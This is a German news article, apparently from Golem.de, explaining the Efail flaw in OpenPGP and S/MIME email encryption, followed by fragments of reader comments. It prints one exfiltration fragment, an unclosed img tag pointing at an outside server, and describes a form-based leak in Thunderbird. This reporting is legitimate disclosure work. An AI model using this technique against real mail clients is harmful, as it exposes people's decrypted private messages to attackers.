PGP/SMIME: Angreifer können sich entschlüsselte E-Mails schicken lassen
Ein Zusammenspiel von veralteten Verschlüsselungsmethoden und HTML-Mails erlaubt es in vielen Fällen, mit OpenPGP oder S/MIME verschlüsselte Nachrichten zu exfiltrieren. Bislang gibt es keine echten Fixes und nur unzureichende Workarounds.

Ein Forscherteam hat eine ganze Reihe von Problemen bei der Verwendung verschlüsselter E-Mails entdeckt. Die Efail getaufte Lücke betrifft beide standardisierten E-Mail-Verschlüsselungsverfahren - OpenPGP und S/MIME - und lässt sich in zahlreichen E-Mail-Clients ausnutzen.
- PGP/SMIME: Angreifer können sich entschlüsselte E-Mails schicken lassen
- Verschlüsselung nicht authentifiziert
- Workarounds, Updates, Gegenmaßnahmen
Das Grundproblem: Verschlüsselung ohne Authentifizierung. S/MIME nutzt einen völlig unauthentifizierten Verschlüsselungsmodus, in OpenPGP ist zwar theoretisch eine Authentifizierung vorgesehen, die ist aber in der Praxis oft nutzlos.
Die Angriffe nutzen HTML-Mails, um entschlüsselte Daten an den Server des Angreifers zu schicken. Dabei wird eine bestehende E-Mail so umgestaltet, dass der HTML-Code eine Anfrage zu einem Server auslöst und dabei den entschlüsselten Text der Mail mitschickt.
Angriff über Multipart-Mails
Bereits daraus lässt sich in manchen Fällen ein Angriff konstruieren. E-Mail-Nachrichten können aus mehreren Teilen bestehen, sogenannte Multipart-Messages. In manchen Mailclients - am einfachsten in Apple Mail - ist es möglich, direkt aus dem HTML-Teil einer Nachricht auf den nachfolgenden Textteil zuzugreifen.
Ein Angreifer kann nun Folgendes machen: Er schickt als ersten Teil einer Nachricht einen HTML-Teil, der beispielsweise ein Bild lädt, aber den HTML-Tag nicht schließt. Also etwa <img src="http://efail.de/. Als zweiten Teil hängt er den verschlüsselten Teil einer Mail an, die er mitgelesen hat, etwa über einen Man-in-the-Middle-Angriff zwischen den Mailservern. Im Mailclient des Opfers passiert nun Folgendes: Ein Bild wird vom Server des Angreifers geladen und als Pfad wird der Inhalt des nachfolgenden Textteils codiert angehängt.
In Apple Mail funktioniert dieser Angriff direkt, in Mozilla Thunderbird werden in der Standardeinstellung keine Bilder geladen. Doch auch hier ist es mit Tricks möglich, eine Exfiltration der Daten zu erreichen. So kann man beispielsweise per HTML ein Formular erzeugen, das die Daten des verschlüsselten Teils an den Angreifer schickt. Da man die Mail über CSS beliebig layouten kann, kann man das auch so machen, dass ein Klick irgendwo in der Mail dazu führt, dass das Formular abgeschickt wird.
Oder nutzen Sie das Golem-pur-Angebot
und lesen Golem.de
- ohne Werbung
- mit ausgeschaltetem Javascript
- mit RSS-Volltext-Feed
Verschlüsselung nicht authentifiziert |
Du solltest Dich mal ein klein wenig mit dem Recht auseinandersetzen. Auch dein...
Hi ich interpretiere das mal so, dass du wissen willst wo es diese Informationen gibt...
-------------------------------------------------------------------------------- +1...
Zumeist Mail von der Seamonkey-Suite (ergo Thunderbird). Nur nutzt das nix, wenn das für...
Natürlich *kann* es das. GnuPG könnte auch ein Abbild Deiner ganzen Mailbox im Speicehr...